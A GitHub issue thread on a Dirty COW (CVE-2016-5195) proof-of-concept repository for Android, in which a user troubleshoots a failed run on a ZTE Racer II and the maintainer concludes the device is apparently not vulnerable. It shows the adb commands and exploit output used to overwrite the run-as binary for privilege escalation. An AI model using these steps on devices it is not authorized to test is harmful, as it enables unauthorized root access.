search

timwr / CVE-2016-5195

CVE-2016-5195 (dirtycow/dirtyc0w) proof of concept for Android
959 stars 395 forks source link

Problem on Android 2.2.2 #33

Closed z3ntu closed 7 years ago

z3ntu commented 8 years ago

$ make run adb shell 'chmod 777 /data/local/tmp/run-as' adb shell '/data/local/tmp/dirtycow /system/bin/run-as /data/local/tmp/run-as' [1] Segmentation fault /data/local/tmp/... adb shell /system/bin/run-as Usage: run-as \ \ [\]

Device is a ZTE Racer II with Android 2.2.2. Wikipedia link: https://en.wikipedia.org/wiki/ZTE_Racer_II

I can think that the shell is a problem as it's extremely bad (arrow-up doesn't work and everything else is also bad)

Running the command in a shell manually:

$ /data/local/tmp/dirtycow /system/bin/run-as /data/local/tmp/run-as [1] + Stopped (signal) /data/local/tmp/dirtycow /system/bin/run-as /data/local/tmp/run-as $ # i pressed enter here [1] Segmentation fault /data/local/tmp/dirtycow /system/bin/run-as /data/local/tmp/run-as

timwr commented 7 years ago

Can you try this branch please? https://github.com/timwr/CVE-2016-5195/tree/oldcow

z3ntu commented 7 years ago

I don't get a segmentation fault anymore but it still doesn't quite work.

$ /data/local/tmp/dirtycow /system/bin/run-as /data/local/tmp/run-as
warning: new file size (9680) and file old size (76136) differ

size 76136

[*] mmap 0x40030000
[*] exploit (patch)
[*] currently 0x40030000=464c457f
[*] madvise = 0x40030000 76136
[*] /proc/self/mem -1048576 1048576
[*] madvise = 0 1048576
[*] exploited 0x40030000=464c457f
$ run-as
Usage: run-as <package-name> <command> [<args>]

$ run-as id
run-as: Package 'id' is unknown
timwr commented 7 years ago

I suspect your device isn't vulnerable. Can you try make test?